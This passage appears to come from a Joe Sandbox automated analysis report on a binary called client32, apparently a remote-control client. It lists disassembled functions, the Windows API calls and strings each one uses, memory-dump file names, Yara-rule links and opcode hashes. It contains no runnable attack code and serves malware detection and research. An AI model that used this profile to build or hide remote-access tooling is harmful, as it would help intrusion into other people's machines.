                                                                                                                                                                • Instruction ID: 298e6396b29eeabd8d352511c8cf028c9fd899b3f0ddf6bd5fc34ff26e9d1feb
                                                                                                                                                                • Opcode Fuzzy Hash: 4711e5a1c1c86c382dbc854a19b4131db48f5f8086dc55bfce866748364dfc87
                                                                                                                                                                • Instruction Fuzzy Hash: 89117F76500205ABD721CA55CCC0EEB77FCEF89758B004919F64A8B540E671F958C7A1
                                                                                                                                                                Function 110ED250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00020019,?,00000000,59FD48C0,00000000,00020019,?,00000000), ref: 110ED280
                                                                                                                                                                  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValuewvsprintf
                                                                                                                                                                • String ID: ($Error %d getting %s
                                                                                                                                                                • API String ID: 141982866-3697087921
                                                                                                                                                                • Opcode ID: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                                                                                                • Instruction ID: 38ad67af7cf9c35c8db4f97e6700948d2d14c8bc089a0f5a48db9c7a16624884
                                                                                                                                                                • Opcode Fuzzy Hash: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                                                                                                • Instruction Fuzzy Hash: 7011A372E01118AFDB00DEA9DD45DEFB3B8EB94225F00816EF81597140DA71E914C761
                                                                                                                                                                Function 1115B940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1115B955
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                                                                  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                                                                                • _memmove.LIBCMT ref: 1115B980
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                • String ID: vector<T> too long
                                                                                                                                                                • API String ID: 1785806476-3788999226
                                                                                                                                                                • Opcode ID: 985b4cd0e0fd15946b68da0742ad1020d4f93cb3bda519e3b04a38a12266c9a7
                                                                                                                                                                • Instruction ID: 9bd9c4d6588b1437e362be7874788b73cfe0ef9cc3fbeba8d3f25e101c44f04d
                                                                                                                                                                • Opcode Fuzzy Hash: 985b4cd0e0fd15946b68da0742ad1020d4f93cb3bda519e3b04a38a12266c9a7
                                                                                                                                                                • Instruction Fuzzy Hash: 360152B56006069FD754CE6DDD808ABF7EDEF843543548A2DE5AA87644EA70B804CBA0
                                                                                                                                                                Function 1100B560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • Error. preventing capbuf overflow, xrefs: 1100B596
                                                                                                                                                                • Error. NULL capbuf, xrefs: 1100B571
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                                                                                • API String ID: 0-3856134272
                                                                                                                                                                • Opcode ID: 1f0c2c9f5a07f47820da7e35dc7bdef2141c31e2dc16fbdf152bb29d9c040303
                                                                                                                                                                • Instruction ID: 72194ce60bb210f9c79eab4ff39d038ff42eb9fd150cdda041a13f8a69250570
                                                                                                                                                                • Opcode Fuzzy Hash: 1f0c2c9f5a07f47820da7e35dc7bdef2141c31e2dc16fbdf152bb29d9c040303
                                                                                                                                                                • Instruction Fuzzy Hash: DA01DBBEE0060997DB10CE65E840ADBB398DBC037DF04897AFA1E93501E671F5918792
                                                                                                                                                                Function 110D12F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                • API String ID: 175691280-2052047905
                                                                                                                                                                • Opcode ID: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                                                                                                • Instruction ID: 2d49a6c718824c4fb39b7936eb355b27ab8e956fb5db8f47369f869790572c39
                                                                                                                                                                • Opcode Fuzzy Hash: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                                                                                                • Instruction Fuzzy Hash: 91F0F979B0021D6BCB01DFA4DC50BFEBBFC9B45208F044099EA04A7240DE706A05C7A5
                                                                                                                                                                Function 110D1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                • API String ID: 175691280-2052047905
                                                                                                                                                                • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                                                                                                • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                                                                                                • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                                                                                                • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                                                                                                Function 1109D3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,1109E29C,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D42D
                                                                                                                                                                Strings
                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D3FE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                                                                                                • API String ID: 199729137-262600717
                                                                                                                                                                • Opcode ID: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                                                                                                • Instruction ID: e717ac8c1df76163528922924e3c5170e1254239c9623c731bd739b822e2347b
                                                                                                                                                                • Opcode Fuzzy Hash: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                                                                                                • Instruction Fuzzy Hash: C2F05E72A55228AFD724DFA4E844A97B7E8EB48720F00451AF95597240C670FC14DBA0
                                                                                                                                                                Function 11029170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread__wcstoi64
                                                                                                                                                                • String ID: *TapiFixPeriod$Bridge
                                                                                                                                                                • API String ID: 1152747075-2058455932
                                                                                                                                                                • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                                                                                                • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                                                                                                • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                                                                                                • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                                                                                                Function 110B7560 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                                                                                • timeBeginPeriod.WINMM(00000001), ref: 110B757B
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                  • Part of subcall function 110B73D0: WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                                                                                                  • Part of subcall function 1110F370: SetEvent.KERNEL32(?,?,1102C684), ref: 1110F37B
                                                                                                                                                                  • Part of subcall function 1110F370: PulseEvent.KERNEL32(00000244,?,1102C684), ref: 1110F38E
                                                                                                                                                                • timeEndPeriod.WINMM(00000001), ref: 110B75A3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$Periodtime$BeginHookObjectPulseSingleUnhookWaitWindows
                                                                                                                                                                • String ID: NewScrape
                                                                                                                                                                • API String ID: 763200252-2412895908
                                                                                                                                                                • Opcode ID: de42278bc56ea97f1e20319eeeaea94f0896c36f1bac89ca636dde1399dfcb8b
                                                                                                                                                                • Instruction ID: d9652ef4dfce3f1deb2d45d2e06c41885c7f0c79012b27388722acfe2186896e
                                                                                                                                                                • Opcode Fuzzy Hash: de42278bc56ea97f1e20319eeeaea94f0896c36f1bac89ca636dde1399dfcb8b
                                                                                                                                                                • Instruction Fuzzy Hash: 32E0D83EF442262BC60467B15809B8E7655CBC4B3DF040035EE169B2C1DEA5750082F6
                                                                                                                                                                Function 110315D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110315E4
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11031605
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                • String ID: ProcessIdToSessionId
                                                                                                                                                                • API String ID: 199729137-2164408197
                                                                                                                                                                • Opcode ID: f7a1def3124ffcfffc56662f94baa37b17619e2ce7444324a9edd23d403945c4
                                                                                                                                                                • Instruction ID: 6759eee5a1a8deb63c28aa2665d99d796cda851c3525b31e6fff9c11b2a2cde5
                                                                                                                                                                • Opcode Fuzzy Hash: f7a1def3124ffcfffc56662f94baa37b17619e2ce7444324a9edd23d403945c4
